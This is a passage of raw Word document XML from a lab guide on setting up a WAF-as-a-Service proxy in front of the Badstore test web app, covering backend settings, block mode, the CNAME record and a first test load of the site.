    </w:p>
    <w:p w:rsidR="077BE973" w:rsidP="3DB4835F" w:rsidRDefault="077BE973" w14:paraId="50369E70" w14:textId="716AA351">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="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On the next screen, for the Backend Server (aka Origin Server), the WAFaaS service resolves the IP for</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="67101B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your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="67101BF5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="67101BF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w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="3AD3261E">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main </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="67101BF5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Name.</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hange the protocol from HTTPS to the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HTTP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protocol, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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Select</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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ort </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE973">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">80,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lick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Test Connection,</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="49C94B9F">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3DB4835F" w:rsidR="49C94B9F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and cli</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k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Continue </w:t>
      </w:r>
      <w:r w:rsidR="077BE973">
        <w:drawing>
          <wp:inline wp14:editId="39EFB551" wp14:anchorId="6649F52A">
            <wp:extent cx="3600450" cy="2376297"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1117986914" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R99c935537f0745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00450" cy="2376297"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="077BE973" w:rsidP="3DB4835F" w:rsidRDefault="077BE973" w14:paraId="1E77B6B2" w14:textId="29AFF44F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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n the Select Mode step, select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Block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d click </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE973">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Add</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w:t>
      </w:r>
      <w:r w:rsidR="077BE973">
        <w:drawing>
          <wp:inline wp14:editId="41D387D6" wp14:anchorId="22B07FCF">
            <wp:extent cx="3673412" cy="2608122"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="367557491" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R90a7153b76bd4e1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73412" cy="2608122"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="077BE973" w:rsidP="50C40F79" w:rsidRDefault="077BE973" w14:paraId="0EB79D18" w14:textId="47B2BCA1">
      <w:pPr>
        <w:spacing w:after="200" w:line="276"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077BE973" w:rsidP="3DB4835F" w:rsidRDefault="077BE973" w14:paraId="1DE6F23A" w14:textId="525CB810">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276"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n the next screen, it will tell you to change the DNS record, </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="17CBADC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ut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e </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="24793DB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ill not be doing that as part of this </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="2CEF4D5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lab</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="24793DB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so just note the domain name under “CHANGE CNAME TO”</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="4142440D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.  This will be referred to throughout this lab as your WAFaaS CNAME.  C</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lick</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="6C40B9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3DB4835F" w:rsidR="274697FB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Close</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077BE973" w:rsidP="50C40F79" w:rsidRDefault="077BE973" w14:paraId="4E333850" w14:textId="039E740D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="20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077BE973">
        <w:drawing>
          <wp:inline wp14:editId="1428D961" wp14:anchorId="52BDD385">
            <wp:extent cx="3686481" cy="2635834"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1696379356" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rd8441892a67a44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86481" cy="2635834"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="077BE973" w:rsidP="3DB4835F" w:rsidRDefault="077BE973" w14:paraId="4A0B5296" w14:textId="057994BB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="7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3DB4835F" w:rsidR="1CD2C392">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOTE: I</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE973">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n a real deployment, you would make this CNAME change to your</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="2608523E">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Website’s </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE973">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS record so that when people go to the original domain </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE973">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">name </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="51DA8C55">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="51DA8C55">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> your website, </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE973">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">they will be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE973">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CNAMEd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE973">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your unique WAFaas domain name as shown in this diagram</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="7AAB1B19">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="2F618452">
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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077BE973">
        <w:drawing>
          <wp:inline wp14:editId="0D55C17A" wp14:anchorId="6DB3241D">
            <wp:extent cx="3794314" cy="1787706"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1844264163" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R9b861d97645e403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794314" cy="1787706"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE97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50C40F79" w:rsidP="50C40F79" w:rsidRDefault="50C40F79" w14:paraId="5DC1A067" w14:textId="6BA0CBF4">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50C40F79" w:rsidP="50C40F79" w:rsidRDefault="50C40F79" w14:paraId="30F82389" w14:textId="6DDB915E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB1043" w:rsidP="00432FC1" w:rsidRDefault="00BB1043" w14:paraId="2E682FB7" w14:textId="102FC3E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00432FC1" w:rsidR="00432FC1" w:rsidP="00D92578" w:rsidRDefault="00432FC1" w14:paraId="1C5FA0C7" w14:textId="73AC13C1"/>
    <w:p w:rsidR="00092C9C" w:rsidRDefault="00092C9C" w14:paraId="44674E3B" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CB00A22" w:rsidP="50C40F79" w:rsidRDefault="2CB00A22" w14:paraId="46DDF0EC" w14:textId="0C067072">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2CB00A22">
        <w:rPr/>
        <w:t>Test your WAF-as-a-Service Application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="406CDF80" w:rsidP="50C40F79" w:rsidRDefault="406CDF80" w14:paraId="74ED220D" w14:textId="19292C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="406CDF80">
        <w:rPr/>
        <w:t xml:space="preserve">You will see your WAFaaS application is being provisioned </w:t>
      </w:r>
      <w:r w:rsidR="406CDF80">
        <w:drawing>
          <wp:inline wp14:editId="02F2BC9F" wp14:anchorId="5EC12E47">
            <wp:extent cx="4015576" cy="2790825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="215061041" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R7ecc3096cfb6487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15576" cy="2790825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="406CDF80" w:rsidP="3DB4835F" w:rsidRDefault="406CDF80" w14:paraId="71EBBDCF" w14:textId="5FE8432B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="406CDF80">
        <w:rPr/>
        <w:t>Because we are not changing the DNS for our application for this lab, you will see “DNS Update Pending” and this is normal</w:t>
      </w:r>
      <w:r w:rsidR="16F05F50">
        <w:rPr/>
        <w:t xml:space="preserve"> for this lab</w:t>
      </w:r>
      <w:r w:rsidR="21DDB771">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="5A1F3C4B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="406CDF80">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CB00A22" w:rsidP="50C40F79" w:rsidRDefault="2CB00A22" w14:paraId="320A50DF" w14:textId="52DC21E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2CB00A22">
        <w:rPr/>
        <w:t>Open your web browser and go to your W</w:t>
      </w:r>
      <w:r w:rsidR="75EE91F1">
        <w:rPr/>
        <w:t>AFaaS</w:t>
      </w:r>
      <w:r w:rsidR="2CB00A22">
        <w:rPr/>
        <w:t xml:space="preserve"> CNAME that you noted </w:t>
      </w:r>
      <w:r w:rsidR="3AF7AC99">
        <w:rPr/>
        <w:t>above</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CB00A22" w:rsidP="50C40F79" w:rsidRDefault="2CB00A22" w14:paraId="6ECEEBCF" w14:textId="672AB962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2CB00A22">
        <w:rPr/>
        <w:t>You will notice the site loads and is now protected with SSL, but you receive an SSL error because of the DNS name mismatch.  This is normal, because we are not making the DNS chan</w:t>
      </w:r>
      <w:r w:rsidR="206C9FF7">
        <w:rPr/>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="2CB00A22">
        <w:rPr/>
        <w:t>es in this lab</w:t>
      </w:r>
      <w:r w:rsidR="0E3CBC61">
        <w:rPr/>
        <w:t xml:space="preserve">, but in a real deployment the DNS names will match and there will not be an SSL error.  </w:t>
      </w:r>
      <w:r w:rsidR="12360D8C">
        <w:rPr/>
        <w:t xml:space="preserve">Click “Proceed” in your web browser </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="12360D8C">
        <w:rPr/>
        <w:t>( Chrome</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="12360D8C">
        <w:rPr/>
        <w:t xml:space="preserve"> example </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="12360D8C">
        <w:rPr/>
        <w:t>shown )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="05FD48BB">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="05FD48BB">
        <w:drawing>
          <wp:inline wp14:editId="0F4D2A35" wp14:anchorId="57528A88">
            <wp:extent cx="4459768" cy="2883983"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="941084381" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R01588b769bdd4f8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459768" cy="2883983"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="12360D8C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E3CBC61" w:rsidP="50C40F79" w:rsidRDefault="0E3CBC61" w14:paraId="307EEBEE" w14:textId="0D0ABAE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0E3CBC61">
        <w:rPr/>
        <w:t xml:space="preserve">Note that other than the SSL error, the </w:t>
      </w:r>
      <w:r w:rsidR="3A8085C2">
        <w:rPr/>
        <w:t>site load</w:t>
      </w:r>
      <w:r w:rsidR="1033E5F5">
        <w:rPr/>
        <w:t>s correctly</w:t>
      </w:r>
      <w:r w:rsidR="3A8085C2">
        <w:rPr/>
        <w:t xml:space="preserve"> through the WAFaaS full proxy.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A8085C2" w:rsidP="3DB4835F" w:rsidRDefault="3A8085C2" w14:paraId="18340AB5" w14:textId="2DEDC1DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="3A8085C2">
        <w:rPr/>
        <w:t xml:space="preserve">Note that the </w:t>
      </w:r>
      <w:r w:rsidR="0E3CBC61">
        <w:rPr/>
        <w:t xml:space="preserve">site is using </w:t>
      </w:r>
      <w:r w:rsidR="69F55DE0">
        <w:rPr/>
        <w:t xml:space="preserve">204-Bit </w:t>
      </w:r>
      <w:r w:rsidR="0E3CBC61">
        <w:rPr/>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="0D549DD4">
        <w:rPr/>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="0A529FB1">
        <w:rPr/>
        <w:t xml:space="preserve"> once the domain name matches, it will automatically receive </w:t>
      </w:r>
      <w:r w:rsidR="0D549DD4">
        <w:rPr/>
        <w:t xml:space="preserve">a certificate </w:t>
      </w:r>
      <w:r w:rsidR="51D8374C">
        <w:rPr/>
        <w:t>matching</w:t>
      </w:r>
      <w:r w:rsidR="0D549DD4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="51D8374C">
        <w:rPr/>
        <w:t xml:space="preserve">your </w:t>
      </w:r>
      <w:r w:rsidR="0D549DD4">
        <w:rPr/>
        <w:t>domain name using Let’s Encrypt</w:t>
      </w:r>
      <w:r w:rsidR="19C0989E">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="2CFD54FC">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="4A667205">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="753CC62C">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">n a real deployment, if needed </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="4A667205">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="19C0989E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">ou </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="3B99E91D">
        <w:rPr>
